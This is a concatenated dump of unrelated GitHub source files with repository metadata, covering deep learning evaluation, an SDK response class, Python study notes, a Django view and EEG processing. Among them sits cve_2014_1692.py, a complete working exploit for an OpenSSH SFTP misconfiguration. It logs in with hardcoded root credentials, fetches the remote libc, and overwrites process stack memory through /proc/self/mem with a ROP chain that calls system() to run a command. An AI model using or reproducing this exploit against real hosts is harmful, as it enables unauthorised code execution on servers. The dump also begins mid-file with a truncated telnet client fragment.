break
self.history.append(cmd)
self.tn.write(cmd.encode('utf8'))
out = self.tn.read_until(b'$ ').decode('utf8')
stdout.write(out[len(cmd)+1:])
stdout.flush()
# client = TelnetClient('192.168.0.105')
# client.connect()
# client.login()
# client.interact()
# client.cleanup()
with TelnetClient('192.168.0.105') as client:
raise Exception('TEST')
client.login()
client.interact()
print('END')
| [
"737248514@qq.com"
] | 737248514@qq.com |
e13861ef225236bfe4712ae37af04bc652f4bb50 | 1caa4080e82a6b18f7c2e52fea25b4e66c0b331b | /C3D-tensorflow-master/lstm.py | c46aa01205fcfec6f0b76e847fdc804da1a3c1e3 | [] | no_license | xixiareone/ouyangruo | 18dd0ae00e54f96ed3f61cd303f486c3c9c84de7 | 7605dbac97ed7ceeef92c14622aa0d7defb52bee | refs/heads/master | 2021-01-21T13:34:33.276346 | 2019-06-18T07:25:21 | 2019-06-18T07:25:21 | 40,350,739 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,509 | py | #!/usr/bin/env python
"""Evaluates the C3D network"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from datetime import datetime
import math
import time
import tensorflow as tf
import numpy as np
import c3d_feature
import input_data
# Basic model parameters as external flags.
FLAGS = tf.app.flags.FLAGS
tf.app.flags.DEFINE_integer('gpu_num', 1,
"""How many GPUs to use""")
tf.app.flags.DEFINE_integer('batch_size', 10,
"""Batch size.""")
tf.app.flags.DEFINE_integer('eval_interval_secs', 60 * 5,
"""How often to run the eval.""")
tf.app.flags.DEFINE_string('checkpoint_dir', 'result',
"""Check point directory.""")
tf.app.flags.DEFINE_boolean('run_once', True,
"""Whether to run eval only once.""")
tf.app.flags.DEFINE_integer('num_examples', 5000,
"""Number of examples to run.""")
def placeholder_inputs(batch_size):
"""Generate placeholder variables to represent the input tensors.
These placeholders are used as inputs by the rest of the model building
code and will be fed from the downloaded data in the .run() loop, below.
Args:
batch_size: The batch size will be baked into both placeholders.
Returns:
images_placeholder: Images placeholder.
labels_placeholder: Labels placeholder.
"""
# Note that the shapes of the placeholders match the shapes of the full
# image and label tensors, except the first dimension is now batch_size
# rather than the full size of the train or test data sets.
images_placeholder = tf.placeholder(tf.float32, shape=(batch_size,
c3d_feature.NUM_FRAMES_PER_CLIP,
c3d_feature.CROP_SIZE,
c3d_feature.CROP_SIZE,
c3d_feature.CHANNELS))
labels_placeholder = tf.placeholder(tf.int64, shape=(batch_size))
return images_placeholder, labels_placeholder
def eval_once(saver, top_k_op, images_placeholder,
labels_placeholder):
"""Run Eval once.
Args:
saver: Saver.
top_k_op: Top K op.
"""
with tf.Session() as sess:
ckpt = tf.train.get_checkpoint_state(FLAGS.checkpoint_dir)
if ckpt and ckpt.model_checkpoint_path:
# Restores from checkpoint
saver.restore(sess, ckpt.model_checkpoint_path)
# Assuming model_checkpoint_path looks something like:
# /my-favorite-path/cifar10_train/model.ckpt-0,
# extract global_step from it.
global_step = ckpt.model_checkpoint_path.split('/')[-1].split('-')[-1]
else:
print('No checkpoint file found')
return
# Start the queue runners.
coord = tf.train.Coordinator()
try:
threads = []
for qr in tf.get_collection(tf.GraphKeys.QUEUE_RUNNERS):
threads.extend(qr.create_threads(sess, coord=coord, daemon=True,
start=True))
num_iter = int(math.ceil(FLAGS.num_examples / FLAGS.batch_size))
true_count = 0 # Counts the number of correct predictions.
total_sample_count = num_iter * FLAGS.batch_size
step = 0
while step < num_iter and not coord.should_stop():
eval_images, eval_labels, _, _, _ = input_data.read_clip_and_label(
filename='list/test.list',
batch_size=FLAGS.batch_size,
num_frames_per_clip=c3d_feature.NUM_FRAMES_PER_CLIP,
crop_size=c3d_feature.CROP_SIZE,
shuffle=True)
predictions = sess.run([top_k_op],
feed_dict={
images_placeholder: eval_images,
labels_placeholder: eval_labels})
true_count += np.sum(predictions)
step += 1
if step % 10 == 0:
print("%i/100" % int(step/num_iter))
# Compute precision @ 1.
precision = true_count / total_sample_count
print('%s: precision @ 1 = %.3f' % (datetime.now(), precision))
except Exception as e: # pylint: disable=broad-except
coord.request_stop(e)
coord.request_stop()
coord.join(threads, stop_grace_period_secs=10)
def evaluate():
with tf.Graph().as_default() as g:
# Get the image and the labels placeholder
images_placeholder, labels_placeholder = placeholder_inputs(FLAGS.batch_size)
# Build the Graph that computes the logits predictions from the inference
# model.
with tf.variable_scope('c3d_var'):
logits = c3d_feature.inference_c3d(images_placeholder)
top_k_op = tf.nn.in_top_k(logits, labels_placeholder, 1)
# Restore the moving average version of the learned variables for eval.
variable_averages = tf.train.ExponentialMovingAverage(
c3d_feature.MOVING_AVERAGE_DECAY)
variables_to_restore = variable_averages.variables_to_restore()
saver = tf.train.Saver(variables_to_restore)
while True:
eval_once(saver, top_k_op, images_placeholder, labels_placeholder)
if FLAGS.run_once:
break
time.sleep(FLAGS.eval_interval_secs)
def main(_):
evaluate()
if __name__ == '__main__':
tf.app.run()
| [
"noreply@github.com"
] | xixiareone.noreply@github.com |
f94d8cdd200a2667c1805cec6a55df31c3973965 | 5a52ccea88f90dd4f1acc2819997fce0dd5ffb7d | /alipay/aop/api/response/AlipayBossFncAntbudgetReturnResponse.py | 3836054a78a576ebfb9a36c10cf8e6cab2ecc400 | [
"Apache-2.0"
] | permissive | alipay/alipay-sdk-python-all | 8bd20882852ffeb70a6e929038bf88ff1d1eff1c | 1fad300587c9e7e099747305ba9077d4cd7afde9 | refs/heads/master | 2023-08-27T21:35:01.778771 | 2023-08-23T07:12:26 | 2023-08-23T07:12:26 | 133,338,689 | 247 | 70 | Apache-2.0 | 2023-04-25T04:54:02 | 2018-05-14T09:40:54 | Python | UTF-8 | Python | false | false | 1,229 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.response.AlipayResponse import AlipayResponse
from alipay.aop.api.domain.BizActionLogDTO import BizActionLogDTO
class AlipayBossFncAntbudgetReturnResponse(AlipayResponse):
def __init__(self):
super(AlipayBossFncAntbudgetReturnResponse, self).__init__()
self._result_data = None
self._result_msg = None
@property
def result_data(self):
return self._result_data
@result_data.setter
def result_data(self, value):
if isinstance(value, BizActionLogDTO):
self._result_data = value
else:
self._result_data = BizActionLogDTO.from_alipay_dict(value)
@property
def result_msg(self):
return self._result_msg
@result_msg.setter
def result_msg(self, value):
self._result_msg = value
def parse_response_content(self, response_content):
response = super(AlipayBossFncAntbudgetReturnResponse, self).parse_response_content(response_content)
if 'result_data' in response:
self.result_data = response['result_data']
if 'result_msg' in response:
self.result_msg = response['result_msg']
| [
"jiandong.jd@antfin.com"
] | jiandong.jd@antfin.com |
13979bc36eda56037d981c8724576dc7b10b6db5 | 7bb9bd2bdadef1590b2ef7ff309e08abf454e49d | /Resolução de problemas II/ListasTuplasDeicionários.py | 8665bcc291cd1e736c9ae453965659f17ca9745c | [] | no_license | ALREstevam/Curso-de-Python-e-Programacao-com-Python | afdf12717a710f20d4513d5df375ba63ba1e1c19 | af6227376736e63810e5979be54eb1c433d669ac | refs/heads/master | 2021-09-07T12:11:17.158298 | 2018-02-22T17:47:19 | 2018-02-22T17:47:19 | 87,453,286 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,982 | py | '''
Arrays são chamados de sequências
Tipos
String
s = 'texto'
Lista
São elementos mútáveis
Podem ter elementos de diferentes tipos
l = ['asa', 1]
Tupla
t = (1, 2, 3)
Tuplas e strings não são mutáveis
Mapping (relacionam chave ao valor)
Acesso
Com números positivos e negativos
0 1 2 3
[] [] [] []
-1 -2 -3 -4
Úteis
aList = []
for number in range(1,11):
aList += [number] #Adiciona elementos na listas
#Os dois elementos são listas
print(aList)
==============================================================
#Via elemento
for item in aList:
print(item) #imprime todos os elementos da lista
#Via índice
for i in range(len(aList)):
print(aList[i]) #imprime todos os elementos da lista
===============================================================
Histograma
values = [0] * 10 # cria uma lista com 10 valores iguais a zero
print('10 inteiros')
for i in range(10):
newValue = int(input('Valor: '))
for i in range(len(values)):
print(values[i] * '*')
==============================================================
Tuplas - lista que não pode ser mudada
currentHour = hour, minute, second
print(currentTime[0])
===============================================================
Desempacotar sequências
aString = 'abc'
first, second, third = aString
===============================================================
Slicing
sequencia[inicio : ]
sequencia[inicio : fim]
sequencia[ : fim]
sequencia[inicio : incremento : fim]
até fim-1
===============================================================
Dicionários
Coleção de valores associativos
Chave -> valor
dictionart = {}
dictionary = {1 : 'one', 2 : 'two'}
> Manipulando
nums = {1 : 'one', 2 : 'two'}
nums[3] = 'three' #adiciona ao dicionárioo
del nums[3] #removendo 3
nums[1] = 'ones' #alterando valor
===============================================================
Métodos = lista, tupla, dicionário (built-in types)
append(item) Insere item no final da lista
count( elemento ) Retorna o número de ocorrencias de elemento na lista.
extend( newList ) Insere os elementos de newList no final da lista
index( elemento ) Returna o indice da primeira ocorrência de elemento na lista
insert( indice, item ) Insere item na posição indice
pop( [indice] ) Sem parametro – remove e retorna o último elemento da lista. Se indice é especificado, remove e retorna o elemento na posição indice.
remove( elemento ) Remove a primeira ocorrencia de elemento da lista.
reverse() Inverte o conteúdo da lista
sort( [function] ) Ordena o conteúdo da lista.
===============================================================
Mpetodos de dicionário
clear() Apaga todos os item do dicionário
copy() Cria uma cópia do dicionário. Cópia referencia o dicionário original
get( key [, returnValue] ) Retorna o valor associado à chave. Se chave não está no dicionário e returnValue é dado, retorna-o.
has_key( key ) Returna 1 se a chave está no dicionário; 0 se não está.
items() Retorna uma lista de tuplas no formato chave-valor.
keys() Retorna uma lista das chaves do dicionário.
popitem() Remove e retorna um par arbitrário como uma tupla de dois elementos.
setdefault( key [,value] ) Se key não está no dicionário e value é especificado, insere o par key-value. Se value não é especificado, value é None.
update( newDictionary ) Adiciona todos pares chave-valor de newDictionary ao dicionário corrente e sobrescreve os valores para as chaves ja existentes.
values() Retorna uma lista de valores no dicionário.
for key in dicionario.keys():
from copy import deepcopy
copiaDistinta = deepcopy(dictionary)
'''
list = ['a','b','c']
list.remove('a')
print(list) | [
"a166348@g.unicamp.com"
] | a166348@g.unicamp.com |
150ef124e051307e4b1000fb4c14a1e6dd8b7691 | 3e44021a7b0c8753e5bb788897358573c21b34db | /apps/users/views.py | c18eb86f906f6002b0f896bae68afd84bb125702 | [] | no_license | DrMartiner/food_diary | e3d07c766aa4c65a9f3fcd6861cade9169442380 | ed5dca3a418247737c2bddbce16a52157cdb16eb | refs/heads/master | 2021-01-01T06:50:34.694745 | 2013-11-23T09:18:41 | 2013-11-23T09:18:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 151 | py | # -*- coding: utf-8 -*-
from django.views.generic import TemplateView
class MyProfileView(TemplateView):
template_name = 'users/my_profile.html' | [
"DrMartiner@GMail.Com"
] | DrMartiner@GMail.Com |
85abd7c55bb2a7aeaba405f4803e34ff03e22faf | 94012eacfd1661185dc78886b912a540dab8085a | /openssh/cve_2014_1692.py | 2be9968388b46486816df43baed506b75c7c25c1 | [] | no_license | sshayb/exploit_scripts | 41dc72095a27c5eb0f1370014cfb6bbcf8890e82 | 07755b2c0428187b7cb5f82bca8616735af86b32 | refs/heads/master | 2023-01-02T00:19:30.048200 | 2020-10-26T01:29:12 | 2020-10-26T01:29:12 | 227,637,487 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,627 | py | # OpenSSH <= 6.6 SFTP misconfiguration exploit for 32/64bit Linux
# The original discovery by Jann Horn: http://seclists.org/fulldisclosure/2014/Oct/35
#
# Adam Simuntis :: https://twitter.com/adamsimuntis
# Mindaugas Slusnys :: https://twitter.com/mislusnys
import paramiko
import sys
import time
#from pwn import *
# parameters
cmd = 'whoami'
host = '10.90.78.29'
port = 22
username = 'root'
password = 'secforce'
# connection
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(hostname = host, port = port, username = username, password = password)
sftp = ssh.open_sftp()
# parse /proc/self/maps to get addresses
log.info("Analysing /proc/self/maps on remote system")
sftp.get('/proc/self/maps','maps')
with open("maps","r") as f:
lines = f.readlines()
for line in lines:
words = line.split()
addr = words[0]
if ("libc" in line and "r-xp" in line):
path = words[-1]
addr = addr.split('-')
BITS = 64 if len(addr[0]) > 8 else 32
print "[+] {}bit libc mapped @ {}-{}, path: {}".format(BITS, addr[0], addr[1], path)
libc_base = int(addr[0], 16)
libc_path = path
if ("[stack]" in line):
addr = addr.split("-")
saddr_start = int(addr[0], 16)
saddr_end = int(addr[1], 16)
print "[+] Stack mapped @ {}-{}".format(addr[0], addr[1])
# download remote libc and extract information
print "[+] Fetching libc from remote system..\n"
sftp.get(str(libc_path), 'libc.so')
e = ELF("libc.so")
sys_addr = libc_base + e.symbols['system']
exit_addr = libc_base + e.symbols['exit']
# gadgets for the RET slide and system()
if BITS == 64:
pop_rdi_ret = libc_base + next(e.search('\x5f\xc3'))
ret_addr = pop_rdi_ret + 1
else:
ret_addr = libc_base + next(e.search('\xc3'))
print "\n[+] system() @ {}".format(hex(sys_addr))
print "[+] 'ret' @ {}".format(hex(ret_addr))
if BITS == 64:
print "[+] 'pop rdi; ret' @ {}\n".format(hex(pop_rdi_ret))
with sftp.open('/proc/self/mem','rw') as f:
if f.writable():
print "[+] We have r/w permissions for /proc/self/mem! All Good."
else:
print "[-] Fatal error. No r/w permission for mem."
sys.exit(0)
log.info("Patching /proc/self/mem on the remote system")
stack_size = saddr_end - saddr_start
new_stack = ""
print "[+] Pushing new stack to {}.. fingers crossed ;))".format(hex(saddr_start))
#sleep(20)
if BITS == 32:
new_stack += p32(ret_addr) * (stack_size/4)
new_stack = cmd + "\x00" + new_stack[len(cmd)+1:-12]
new_stack += p32(sys_addr)
new_stack += p32(exit_addr)
new_stack += p32(saddr_start)
else:
new_stack += p64(ret_addr) * (stack_size/8)
new_stack = cmd + "\x00" + new_stack[len(cmd)+1:-32]
new_stack += p64(pop_rdi_ret)
new_stack += p64(saddr_start)
new_stack += p64(sys_addr)
new_stack += p64(exit_addr)
# debug info
with open("fake_stack","w") as lg:
lg.write(new_stack)
# write cmd to top off the stack
f.seek(saddr_start)
f.write(cmd + "\x00")
# write the rest from bottom up, we're going to crash at some point
for off in range(stack_size - 32000, 0, -32000):
cur_addr = saddr_start + off
try:
f.seek(cur_addr)
f.write(new_stack[off:off+32000])
except:
print "Stack write failed - that's probably good!"
print "Check if you command was executed..."
sys.exit(0)
sftp.close()
ssh.close()
| [
"root@localhost.localdomain"
] | root@localhost.localdomain |
09afd1ec9f2a9c10b008d929da2e7cdaf0b635c1 | fb1e852da0a026fb59c8cb24aeb40e62005501f1 | /edgelm/examples/wav2vec/unsupervised/data/extracted_features_dataset.py | de470ddc318a5b817f42a7a595ab91eef4ded58e | [
"LGPL-2.1-or-later",
"LicenseRef-scancode-free-unknown",
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference",
"MIT"
] | permissive | microsoft/unilm | 134aa44867c5ed36222220d3f4fd9616d02db573 | b60c741f746877293bb85eed6806736fc8fa0ffd | refs/heads/master | 2023-08-31T04:09:05.779071 | 2023-08-29T14:07:57 | 2023-08-29T14:07:57 | 198,350,484 | 15,313 | 2,192 | MIT | 2023-08-19T11:33:20 | 2019-07-23T04:15:28 | Python | UTF-8 | Python | false | false | 4,314 | py | # Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import logging
import os
import contextlib
import numpy as np
import torch
from fairseq.data import FairseqDataset, data_utils
logger = logging.getLogger(__name__)
class ExtractedFeaturesDataset(FairseqDataset):
def __init__(
self,
path,
split,
min_length=3,
max_length=None,
labels=None,
label_dict=None,
shuffle=True,
sort_by_length=True,
):
super().__init__()
self.min_length = min_length
self.max_length = max_length
self.shuffle = shuffle
self.sort_by_length = sort_by_length
self.label_dict = label_dict
if labels is not None:
assert label_dict is not None
self.sizes = []
self.offsets = []
self.labels = []
path = os.path.join(path, split)
data_path = path
self.data = np.load(data_path + ".npy", mmap_mode="r")
offset = 0
skipped = 0
if not os.path.exists(path + f".{labels}"):
labels = None
with open(data_path + ".lengths", "r") as len_f, open(
path + f".{labels}", "r"
) if labels is not None else contextlib.ExitStack() as lbl_f:
for line in len_f:
length = int(line.rstrip())
lbl = None if labels is None else next(lbl_f).rstrip().split()
if length >= min_length and (
max_length is None or length <= max_length
):
self.sizes.append(length)
self.offsets.append(offset)
if lbl is not None:
self.labels.append(lbl)
offset += length
self.sizes = np.asarray(self.sizes)
self.offsets = np.asarray(self.offsets)
logger.info(f"loaded {len(self.offsets)}, skipped {skipped} samples")
def __getitem__(self, index):
offset = self.offsets[index]
end = self.sizes[index] + offset
feats = torch.from_numpy(self.data[offset:end].copy()).float()
res = {"id": index, "features": feats}
if len(self.labels) > 0:
res["target"] = self.label_dict.encode_line(
self.labels[index],
line_tokenizer=lambda x: x,
append_eos=False,
)
return res
def __len__(self):
return len(self.sizes)
def collater(self, samples):
if len(samples) == 0:
return {}
features = [s["features"] for s in samples]
sizes = [len(s) for s in features]
target_size = max(sizes)
collated_features = features[0].new_zeros(
len(features), target_size, features[0].size(-1)
)
padding_mask = torch.BoolTensor(collated_features.shape[:-1]).fill_(False)
for i, (f, size) in enumerate(zip(features, sizes)):
collated_features[i, :size] = f
padding_mask[i, size:] = True
res = {
"id": torch.LongTensor([s["id"] for s in samples]),
"net_input": {"features": collated_features, "padding_mask": padding_mask},
}
if len(self.labels) > 0:
target = data_utils.collate_tokens(
[s["target"] for s in samples],
pad_idx=self.label_dict.pad(),
left_pad=False,
)
res["target"] = target
return res
def num_tokens(self, index):
return self.size(index)
def size(self, index):
return self.sizes[index]
def ordered_indices(self):
"""Return an ordered list of indices. Batches will be constructed based
on this order."""
if self.shuffle:
order = [np.random.permutation(len(self))]
else:
order = [np.arange(len(self))]
if self.sort_by_length:
order.append(self.sizes)
return np.lexsort(order)[::-1]
else:
return order[0]
| [
"tage@sandbox12.t0ekrjpotp2uhbmhwy0wiwkeya.xx.internal.cloudapp.net"
] | tage@sandbox12.t0ekrjpotp2uhbmhwy0wiwkeya.xx.internal.cloudapp.net |
d4839e5d1454adf699dbf34d35ca809c5556285a | 9d13010b35a14c7c9ba55e704c76777f3f380885 | /demo1_sigpro_old.py | 3cff8956f97cf7dfd5507344169e3653f5c95022 | [] | no_license | trzp/BCIpf | 20e5732025bd604c67001c6dc65b479686187646 | fc4d1262b3e286bfde046fbfe5f71f73e6fa4395 | refs/heads/master | 2020-07-26T18:32:04.473503 | 2020-07-23T14:14:45 | 2020-07-23T14:14:45 | 208,733,546 | 1 | 3 | null | null | null | null | UTF-8 | Python | false | false | 2,587 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2019/9/18 9:52
# @Version : 1.0
# @File : demo1_sigpro.py
# @Author : Jingsheng Tang
# @Version : 1.0
# @Contact : mrtang@nudt.edu.cn mrtang_cs@163.com
# @License : (C) All Rights Reserved
from sigpro import SigPro
from sigpro import DefaultCoder
from scipy import signal as scipy_signal
import json
from cca import *
import time
class SigProApp(SigPro):
def __init__(self, configs_path='./config.js'):
super(SigProApp, self).__init__(configs_path)
self.CODER = DefaultCoder()
self.data = []
self.accdata = False
self.calres = False
with open(configs_path,'r') as f:
self.configs = json.loads(f.read())
Fs = self.configs['signal_processing']['samplingrate']
fs = Fs / 2
Wp = [5 / fs, 45 / fs]
Ws = [3 / fs, 48 / fs]
[N, Wn] = scipy_signal.cheb1ord(Wp, Ws, 4, 20)
[self.f_b, self.f_a] = scipy_signal.cheby1(N, 0.5, Wn, btype='bandpass')
self.ff = [8, 9, 11, 12]
t = np.arange(0, 20, 1. / Fs)
self.sx = []
for f in self.ff:
x1 = np.mat(np.sin(2 * np.pi * f * t))
x2 = np.mat(np.cos(2 * np.pi * f * t))
x3 = np.mat(np.sin(4 * np.pi * f * t))
x4 = np.mat(np.cos(4 * np.pi * f * t))
x = np.vstack([x1, x2, x3, x4])
self.sx.append(x)
def process(self, eeg, marker):
if len(marker)>0:
print(marker)
if marker['process']['value'][0] == 1:
self.accdata = True
elif marker['process']['value'][0] == 2:
self.calres = True
self.accdata = False
else:
pass
if self.accdata:
self.data.append(eeg)
if self.calres:
fff = time.clock()
if len(self.data) == 0:
return 0
dd = np.hstack(self.data)
datafilt = scipy_signal.filtfilt(self.f_b, self.f_a, dd) #滤波处理
ll = datafilt.shape[1]
relate = []
for x in self.sx:
a,b,r = cca(x[:,:ll],datafilt)
relate.append(np.max(r))
indx = np.argmax(relate)
self.RESULT = self.ff[indx]
print(self.RESULT)
self.data = []
self.calres = False
print(time.clock()-fff,'??')
return 1
return 0
def main():
sp = SigProApp()
sp.start_run()
if __name__ == '__main__':
main()
| [
"mrtang@nudt.edu.cn"
] | mrtang@nudt.edu.cn |
bbb0735de098f944fb96c589c586fb888bcbabb4 | ba2dbc19e899faaa17b994a1224e455a3de5b9ad | /02 Data Science/1. Collection/1. Format_practice/1. XML/329_3.py | 69ae0e4d1d52868338c053f454ecd5cd50dd8f66 | [] | no_license | xsky21/bigdata2019 | 52d3dc9379a05ba794c53a28284de2168d0fc366 | 19464a6f8862b6e6e3d4e452e0dab85bdd954e40 | refs/heads/master | 2020-04-21T10:56:34.637812 | 2019-04-16T04:16:27 | 2019-04-16T04:16:27 | 169,503,618 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 295 | py | from xml.etree.ElementTree import Element,dump,SubElement
note = Element('note', date="20120104") #attrib를 써서 속성을 추가하는 것과 같은 결과가 나온다
to = Element('to') #자식 노드
to.text = "Tove"
note.append(to)
SubElement(note,"from_tag").text="Jani"
dump(note)
| [
"studerande5@gmail.com"
] | studerande5@gmail.com |
5ff2bca4503ea9f750bdf2e9302a68d044f31976 | acd41dc7e684eb2e58b6bef2b3e86950b8064945 | /res/packages/scripts/scripts/client/gui/Scaleform/genConsts/ACHIEVEMENTS_ALIASES.py | a1ac9cb63c4d955caad56510b952f353f13adbe0 | [] | no_license | webiumsk/WoT-0.9.18.0 | e07acd08b33bfe7c73c910f5cb2a054a58a9beea | 89979c1ad547f1a1bbb2189f5ee3b10685e9a216 | refs/heads/master | 2021-01-20T09:37:10.323406 | 2017-05-04T13:51:43 | 2017-05-04T13:51:43 | 90,268,530 | 0 | 0 | null | null | null | null | WINDOWS-1250 | Python | false | false | 668 | py | # 2017.05.04 15:24:50 Střední Evropa (letní čas)
# Embedded file name: scripts/client/gui/Scaleform/genConsts/ACHIEVEMENTS_ALIASES.py
class ACHIEVEMENTS_ALIASES(object):
"""
DO NOT MODIFY!
Generated with yaml.
__author__ = 'yaml_processor'
"""
GREY_COUNTER = 'GreyCounter_UI'
YELLOW_COUNTER = 'YellowCounter_UI'
RED_COUNTER = 'RedCounter_UI'
BEIGE_COUNTER = 'BeigeCounter_UI'
# okay decompyling C:\Users\PC\wotmods\files\originals\res\packages\scripts\scripts\client\gui\Scaleform\genConsts\ACHIEVEMENTS_ALIASES.pyc
# decompiled 1 files: 1 okay, 0 failed, 0 verify failed
# 2017.05.04 15:24:50 Střední Evropa (letní čas)
| [
"info@webium.sk"
] | info@webium.sk |
758a84fd0672f8afe1f8b3219aa65bafbbec84ef | f0e25779a563c2d570cbc22687c614565501130a | /LeetCode/Stack/739_daily_temperatures.py | eb4e5e5065af97f3fce52ffc691277a8b67a24e6 | [] | no_license | XyK0907/for_work | 8dcae9026f6f25708c14531a83a6593c77b38296 | 85f71621c54f6b0029f3a2746f022f89dd7419d9 | refs/heads/master | 2023-04-25T04:18:44.615982 | 2021-05-15T12:10:26 | 2021-05-15T12:10:26 | 293,845,080 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,059 | py | class Solution(object):
def dailyTemperatures(self, T):
"""
Time O(n)
Space O(W) W is the number of allowed values for T[i]
:type T: List[int]
:rtype: List[int]
"""
length = len(T)
res = [0] * length
stack = []
for i in range(length):
while stack and T[stack[-1]] < T[i]:
prev_idx = stack.pop()
res[prev_idx] = i - prev_idx
stack.append(i)
return res
def dailyTemperatures_another(self, T):
"""
:type T: List[int]
:rtype: List[int]
"""
length = len(T)
res = [0] * length
stack = []
for i in range(length - 1, -1, -1):
while stack and T[stack[-1]] <= T[i]:
stack.pop()
if stack:
res[i] = stack[-1] - i
stack.append(i)
return res
if __name__ == '__main__':
solution = Solution()
print(solution.dailyTemperatures_another(T = [73, 74, 75, 71, 69, 72, 76, 73])) | [
"cherry.kong0907@gmail.com"
] | cherry.kong0907@gmail.com |
680928b2ad532848f8dc1b18f365d874146fd9e7 | ff5d91e9eee4dd41e85d418120f11daec71cf93b | /2011/nazionali/scuola/gen/generatore.py | 99b8f8ad290fc1d89238d99730ffe88c4278e660 | [] | no_license | olimpiadi-informatica/oii | d0023c5fa00100cadc6a13b1e153fca0017177ca | ce6bc7e8b40a32c01611f4b20ee72f8a9318eafd | refs/heads/master | 2021-05-16T02:35:15.742339 | 2020-03-14T21:56:18 | 2020-03-14T21:56:18 | 28,759,072 | 31 | 6 | null | 2019-12-15T12:37:53 | 2015-01-04T00:55:52 | C++ | UTF-8 | Python | false | false | 508 | py | #!/usr/bin/env python2
from limiti import *
usage="""Generatore per "scuola".
Parametri:
* N (numero di eroi)
* P (tipo di prova)
Constraint:
* 1 <= N < %d
* P == 1 || P == 2
* P == 2 => N = 2^n
""" % MAXN
from sys import argv, exit, stderr
import os
from numpy.random import seed, random, randint
from random import choice, sample
def run(N, S):
print N, P
if __name__ == "__main__":
if len(argv) != 3:
print usage
exit(1)
N, P = [int(x) for x in argv[1:]]
run(N, P)
| [
"williamdiluigi@gmail.com"
] | williamdiluigi@gmail.com |
898bfbc18f1fc8480db3c2f533cd9d6fb01c31cf | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02556/s103128743.py | c6fdb69398ed5464103d08827a895a139796cf40 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 673 | py | import sys
input=sys.stdin.buffer.readline
#sys.setrecursionlimit(10**9)
#from functools import lru_cache
def RD(): return sys.stdin.read()
def II(): return int(input())
def MI(): return map(int,input().split())
def MF(): return map(float,input().split())
def LI(): return list(map(int,input().split()))
def LF(): return list(map(float,input().split()))
def TI(): return tuple(map(int,input().split()))
# rstrip().decode('utf-8')
def main():
n=II()
XY=[LI() for _ in range(n)]
A=[]
B=[]
for x,y in XY:
A.append(x+y)
B.append(x-y)
A.sort()
B.sort()
a=A[-1]-A[0]
b=B[-1]-B[0]
print(max(a,b))
if __name__=="__main__":
main()
| [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
2f530cb3eda17fc6b071b7ae0c313d303a5c766e | 725ac5a0bf72829be627bf8dc82fdc51ba0f94ae | /Text_Classification/Fasttext/step1_get_data_to_examples.py | 55cc1e4866d8e585585ad74b7ba4095138ea7202 | [] | no_license | shawroad/NLP_pytorch_project | fa14b6e4a156229765e1d552901d0492d8e1def3 | 1272fed2dc8fef78a9ded0f1ae1644d613a3b57b | refs/heads/master | 2023-06-25T02:37:35.503251 | 2023-06-12T10:57:11 | 2023-06-12T10:57:11 | 229,694,655 | 530 | 104 | null | 2020-12-08T09:21:47 | 2019-12-23T06:54:29 | Python | UTF-8 | Python | false | false | 2,660 | py | # -*- encoding: utf-8 -*-
'''
@File : construct_data.py
@Time : 2020/11/04 13:49:38
@Author : xiaolu
@Contact : luxiaonlp@163.com
'''
import gzip
import pickle
import json
import jieba
from tqdm import tqdm
import random
class RankExample(object):
def __init__(self,
doc_id,
question_text,
context,
answer=None,
label=None,
keywords=None
):
# keywords
self.doc_id = doc_id
self.question_text = question_text
self.context = context
self.answer = answer
self.label = label
self.keywords = keywords
def __str__(self):
return self.__repr__()
def __repr__(self):
s = ""
s += "doc_id: %s" % (str(self.doc_id))
s += ", question_text: %s" % (self.question_text)
s += ", context: %s" % (self.context)
s += ", answer: %s" % (self.answer)
s += ", label: %d" % (self.label)
s += ", keyword: {}".format(self.keywords)
return s
def construct(data):
doc_id = 0
examples = []
pos_sample = 0
neg_sample = 0
for item in tqdm(data):
question = item['question']
answer = item['answer']
related_doc = item['related_doc']
if len(related_doc) == 0:
continue
for doc in related_doc:
doc_id += 1
text = doc['body']
keywords = doc['keywords']
if text.find(answer) != -1:
pos_sample += 1
examples.append(RankExample(doc_id=doc_id, question_text=question, context=text, answer=answer, label=1, keywords=keywords))
else:
neg_sample += 1
examples.append(RankExample(doc_id=doc_id, question_text=question, context=text, answer=answer, label=0, keywords=keywords))
print('正样本个数:', pos_sample) # 48611 12324
print('负样本个数:', neg_sample) # 692525 170526
# 训练集 正:负=48611:692525
# 验证集 正:负=12324:170526
return examples
if __name__ == '__main__':
# 加载全部数据
train_data = json.load(open('./data/train_policy.json', 'r', encoding='utf8'))
dev_data = json.load(open('./data/dev_policy.json', 'r', encoding='utf8'))
train_examples = construct(train_data)
with gzip.open('./data/train_examples.pkl.gz', 'wb') as fout:
pickle.dump(train_examples, fout)
dev_examples = construct(dev_data)
with gzip.open('./data/dev_examples.pkl.gz', 'wb') as fout:
pickle.dump(dev_examples, fout)
| [
"luxiaonlp@163.com"
] | luxiaonlp@163.com |
